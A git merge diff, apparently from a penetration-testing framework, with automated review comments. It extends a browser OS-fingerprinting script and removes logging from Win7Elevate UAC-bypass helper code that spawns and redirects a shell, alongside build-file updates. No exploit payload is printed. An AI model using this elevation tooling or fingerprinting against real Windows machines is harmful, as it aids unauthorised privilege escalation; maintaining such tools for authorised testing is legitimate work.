Merge remote-tracking branch 'upstream/master' into bypassuac_redo
Conflicts: external/source/exploits/make.bat
commit
2a6258be15
|
@ -196,8 +196,7 @@ window.os_detect.getVersion = function(){
|
||||||
if (!ua_version || 0 == ua_version.length) {
|
if (!ua_version || 0 == ua_version.length) {
|
||||||
ua_is_lying = true;
|
ua_is_lying = true;
|
||||||
}
|
}
|
||||||
} else if (!document.all && navigator.taintEnabled ||
|
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
|
||||||
'MozBlobBuilder' in window) {
|
|
||||||
// Use taintEnabled to identify FF since other recent browsers
|
// Use taintEnabled to identify FF since other recent browsers
|
||||||
// implement window.getComputedStyle now. For some reason, checking for
|
// implement window.getComputedStyle now. For some reason, checking for
|
||||||
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
||||||
|
@ -882,6 +881,18 @@ window.os_detect.getVersion = function(){
|
||||||
os_flavor = "7";
|
os_flavor = "7";
|
||||||
os_sp = "SP1";
|
os_sp = "SP1";
|
||||||
break;
|
break;
|
||||||
|
case "11016428":
|
||||||
|
// IE 11.0.9600.16428 / Windows 7 SP1
|
||||||
|
ua_version = "11.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "10016384":
|
||||||
|
// IE 10.0.9200.16384 / Windows 8 x86
|
||||||
|
ua_version = "10.0";
|
||||||
|
os_flavor = "8";
|
||||||
|
os_sp = "SP0";
|
||||||
|
break;
|
||||||
case "1000":
|
case "1000":
|
||||||
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
||||||
ua_version = "10.0";
|
ua_version = "10.0";
|
||||||
|
|
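Review bot: The new `case "11016428":` and `case "10016384":` branches derive `os_flavor` and `os_sp` from the IE build number alone, yet the comments record only the one configuration each string was observed on (`// IE 11.0.9600.16428 / Windows 7 SP1`). A given IE build may also appear on other Windows releases once updates are applied, so a reader should be told this is a best-effort fingerprint rather than a firm mapping; I would extend each comment to `// IE 11.0.9600.16428 / observed on Windows 7 SP1 — build number alone does not pin the OS`. The enclosing `getVersion` switch starts and ends outside this hunk.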
|
@ -8,46 +8,6 @@
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#include <WinIOCtl.h>
|
#include <WinIOCtl.h>
|
||||||
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
|
|
||||||
std::wstring CError::Format( DWORD ErrorCode )
|
|
||||||
{
|
|
||||||
return Format( ErrorCode, NULL, NULL );
|
|
||||||
}
|
|
||||||
|
|
||||||
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
|
|
||||||
{
|
|
||||||
LPVOID lpvMessageBuffer;
|
|
||||||
|
|
||||||
FormatMessage(
|
|
||||||
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
|
|
||||||
NULL, ErrorCode,
|
|
||||||
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
|
|
||||||
(LPTSTR)&lpvMessageBuffer, 0, NULL);
|
|
||||||
|
|
||||||
std::wstring result;
|
|
||||||
|
|
||||||
std::wostringstream es(TEXT(""));
|
|
||||||
es << ErrorCode;
|
|
||||||
|
|
||||||
if ( Title )
|
|
||||||
{ result.append( Title ); result.append( TEXT("\n") ); }
|
|
||||||
else
|
|
||||||
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
|
|
||||||
|
|
||||||
if ( API )
|
|
||||||
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
|
|
||||||
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
|
|
||||||
if( lpvMessageBuffer )
|
|
||||||
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
|
|
||||||
|
|
||||||
if ( lpvMessageBuffer )
|
|
||||||
{ LocalFree(lpvMessageBuffer); }
|
|
||||||
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
|
|
||||||
/*************************************************************************************************/
|
/*************************************************************************************************/
|
||||||
/*************************************************************************************************/
|
/*************************************************************************************************/
|
||||||
|
@ -142,90 +102,3 @@ CInterprocessStorage::~CInterprocessStorage()
|
||||||
CloseHandle( _hMapping );
|
CloseHandle( _hMapping );
|
||||||
}
|
}
|
||||||
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
|
|
||||||
std::wstring CLogger::GetPath()
|
|
||||||
{
|
|
||||||
std::wstring path;
|
|
||||||
|
|
||||||
TCHAR buffer[MAX_PATH];
|
|
||||||
if ( GetTempPath( MAX_PATH, buffer ) )
|
|
||||||
{
|
|
||||||
path.assign( buffer );
|
|
||||||
path.append( TEXT("w7e.log") );
|
|
||||||
}
|
|
||||||
|
|
||||||
return path;
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Reset()
|
|
||||||
{
|
|
||||||
DeleteFile( GetPath().c_str() );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( std::wstring& Text )
|
|
||||||
{
|
|
||||||
std::wstring tmp( Text.c_str() );
|
|
||||||
tmp.append( TEXT("\n") );
|
|
||||||
Log( tmp );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( )
|
|
||||||
{
|
|
||||||
Log( TEXT("\n") );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( const TCHAR *Text )
|
|
||||||
{
|
|
||||||
if ( Text )
|
|
||||||
LogLine( std::wstring( Text ) );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( const TCHAR Char )
|
|
||||||
{
|
|
||||||
std::wstring tmp;
|
|
||||||
tmp.append( &Char, 1 );
|
|
||||||
Log( tmp );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( const TCHAR *Text )
|
|
||||||
{
|
|
||||||
if ( Text )
|
|
||||||
Log( std::wstring( Text ) );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( std::wstring& Text )
|
|
||||||
{
|
|
||||||
TCHAR buffer[MAX_PATH];
|
|
||||||
//
|
|
||||||
// We have to check it every time to be reflective if user created this file
|
|
||||||
// while program was runnig.
|
|
||||||
//
|
|
||||||
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
|
|
||||||
{
|
|
||||||
std::wstring dbg( buffer );
|
|
||||||
dbg.append( TEXT(".debug") );
|
|
||||||
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
|
|
||||||
if ( INVALID_HANDLE_VALUE == hdbg )
|
|
||||||
return;
|
|
||||||
|
|
||||||
CloseHandle( hdbg );
|
|
||||||
}
|
|
||||||
|
|
||||||
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
|
|
||||||
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
|
|
||||||
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
|
|
||||||
if( INVALID_HANDLE_VALUE != hFile )
|
|
||||||
{
|
|
||||||
SetFilePointer( hFile, 0, NULL, FILE_END );
|
|
||||||
|
|
||||||
DWORD written;
|
|
||||||
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
|
|
||||||
|
|
||||||
CloseHandle( hFile );
|
|
||||||
}
|
|
||||||
if ( mutex ) ReleaseMutex( mutex );
|
|
||||||
if ( mutex ) CloseHandle( mutex );
|
|
||||||
}
|
|
|
@ -13,9 +13,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
assert( Parameter );
|
assert( Parameter );
|
||||||
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
||||||
|
|
||||||
CLogger::Log( TEXT("Hello redirector thread: ") );
|
|
||||||
CLogger::LogLine( pair->Name );
|
|
||||||
|
|
||||||
CHAR read_buff[2];
|
CHAR read_buff[2];
|
||||||
DWORD nBytesRead,nBytesWrote;
|
DWORD nBytesRead,nBytesWrote;
|
||||||
|
|
||||||
|
@ -25,11 +22,7 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
{
|
{
|
||||||
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("ReadFile") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -67,11 +60,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
|
|
||||||
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("WriteConsoleInput") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -80,11 +68,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
{
|
{
|
||||||
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("WriteFile") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -92,8 +75,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
CLogger::Log( TEXT("Bye redirector thread: ") );
|
|
||||||
CLogger::LogLine( pair->Name );
|
|
||||||
return EXIT_SUCCESS;
|
return EXIT_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -20,7 +20,6 @@
|
||||||
|
|
||||||
int _tmain(int argc, _TCHAR* argv[])
|
int _tmain(int argc, _TCHAR* argv[])
|
||||||
{
|
{
|
||||||
CLogger::LogLine(TEXT("TIOR: Hello"));
|
|
||||||
|
|
||||||
TRedirectorPair in = {0};
|
TRedirectorPair in = {0};
|
||||||
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||||
|
@ -79,9 +78,6 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
||||||
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
|
|
||||||
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
|
|
||||||
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
|
|
||||||
|
|
||||||
STARTUPINFO si = {0};si.cb = sizeof(si);
|
STARTUPINFO si = {0};si.cb = sizeof(si);
|
||||||
PROCESS_INFORMATION pi = {0};
|
PROCESS_INFORMATION pi = {0};
|
||||||
|
@ -100,11 +96,6 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
|
|
||||||
if ( ! created )
|
if ( ! created )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
TEXT("TIOR: Unable to create child process"),
|
|
||||||
TEXT("CreateProcess")));
|
|
||||||
|
|
||||||
return EXIT_FAILURE;
|
return EXIT_FAILURE;
|
||||||
}
|
}
|
||||||
|
@ -113,14 +104,12 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
CloseHandle( pi.hThread );
|
CloseHandle( pi.hThread );
|
||||||
}
|
}
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
|
|
||||||
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
||||||
//
|
//
|
||||||
// Waiting for eny handle to be freed.
|
// Waiting for eny handle to be freed.
|
||||||
// Either some IO thread will die or process will be oevered.
|
// Either some IO thread will die or process will be oevered.
|
||||||
//
|
//
|
||||||
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
||||||
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
||||||
|
@ -132,11 +121,9 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
// Dont forget to close child process. We need to be sure, if user terminated app which
|
// Dont forget to close child process. We need to be sure, if user terminated app which
|
||||||
// reads our redirected data, we terminate the target child app.
|
// reads our redirected data, we terminate the target child app.
|
||||||
//
|
//
|
||||||
CLogger::LogLine(TEXT("TIOR: Killing child process"));
|
|
||||||
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
||||||
CloseHandle( pi.hProcess );
|
CloseHandle( pi.hProcess );
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: Exit"));
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// I will not close any handles here - system will terminate and close all by it self.
|
// I will not close any handles here - system will terminate and close all by it self.
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -63,26 +67,31 @@
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -90,6 +99,8 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -99,6 +110,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -106,11 +121,17 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -121,6 +142,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -132,6 +154,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -142,6 +168,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -153,6 +180,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="stdafx.h" />
|
<ClInclude Include="stdafx.h" />
|
||||||
|
|
|
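Review bot: `<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>` is added only to the Release|x64 property group, so the Win32 and both Debug configurations will not get the same analysis; either add the same line to the other three groups or drop it so the configurations stay in step. The four new `<PostBuildEvent><Command></Command></PostBuildEvent>` blocks are empty and can be removed outright; an empty command is noise that invites a later build step being pasted into only one configuration. None of these hunks show the linker hardening settings (DYNAMICBASE, NXCOMPAT, /GS), so presumably they are left at the v120 defaults — worth confirming, since this is the executable that gets embedded into the elevation binary.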
@ -1,6 +1,8 @@
|
||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio 2010
|
# Visual Studio 2013
|
||||||
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
||||||
ProjectSection(SolutionItems) = preProject
|
ProjectSection(SolutionItems) = preProject
|
||||||
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
||||||
|
@ -18,37 +20,32 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
|
|
||||||
Debug|Win32 = Debug|Win32
|
Debug|Win32 = Debug|Win32
|
||||||
Debug|x64 = Debug|x64
|
Debug|x64 = Debug|x64
|
||||||
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
|
|
||||||
Release|Win32 = Release|Win32
|
Release|Win32 = Release|Win32
|
||||||
Release|x64 = Release|x64
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
